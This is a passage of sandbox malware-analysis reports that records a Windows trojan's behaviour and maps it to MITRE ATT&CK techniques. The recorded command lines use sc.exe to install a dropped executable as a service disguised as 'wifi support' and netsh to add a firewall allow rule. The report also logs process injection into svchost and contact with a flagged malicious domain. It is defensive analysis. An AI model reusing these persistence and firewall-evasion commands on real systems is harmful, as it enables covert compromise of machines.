{\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"qoxyhdso.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"qoxyhdso.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1a61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"916248\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003080)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"qoxyhdso.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\YUCMTNPT\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qoxyhdso.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qoxyhdso.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"qoxyhdso.exe.67EE4A71.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"qoxyhdso.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qoxyhdso.exe]- [targetUID: 00000000-00005996]\n \"DISMHOST.EXE.67EE53F7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has section name .text with entropy \"6.630102803682182\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has section name .text with entropy \"7.972855291312212\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has section name .reloc with entropy \"6.221496050028631\"\n \"qoxyhdso.exe\" has section name .text with entropy \"6.630102803682182\"\n \"qoxyhdso.exe\" has section name .text with entropy \"7.972855291312212\"\n \"qoxyhdso.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE53F7.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE53F7.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (UID: 00000000-00005996)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005772)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qoxyhdso.exe\" %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005964)\n Spawned process \"sc.exe\" with commandline \"create yucmtnpt binPath= \"%WINDIR%\\\\system32\\\\yucmtnpt\\\\qoxyhdso.exe /d\\\\\"C:\\\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00002296)\n Spawned process \"sc.exe\" with commandline \"description yucmtnpt \"wifi internet conection\"\" (UID: 00000000-00006024)\n Spawned process \"sc.exe\" with commandline \"start yucmtnpt\" (UID: 00000000-00004312)\n Spawned process \"qoxyhdso.exe\" with commandline \"/d\"C:\\\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\"\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003080)\n Spawned process \"svchost.exe\" (UID: 00000000-00003960)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"qoxyhdso.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qoxyhdso.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qoxyhdso.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qoxyhdso.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"qoxyhdso.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"qoxyhdso.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start yucmtnpt\" (UID: 00000000-00004312)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003080)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465
https://hybrid-analysis.com/sample/7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465
Hybrid Analysis - Um_unhooking
{"size": 368128, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465", "sha256": "7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465", "av_detect": 81, "vx_family": "Fragtor.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 116, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24245)", "1 Unknown Resource Files (build: 0)", "1 Unknown Objects (build: 24245)", "2 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24245)"], "imported_objects": ["18 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "35 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "20 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "20 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30795)", "142 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30795)", "9 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30795)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (2 files)"], "total_file_compositions_imports": 13}, "processes": [{"uid": "00000000-00006088", "name": "7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe", "normalized_path": "C:\\7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465.exe", "sha256": "7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465", "av_label": "Trojan.Llac", "av_matched": 2, "av_total": 14}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": 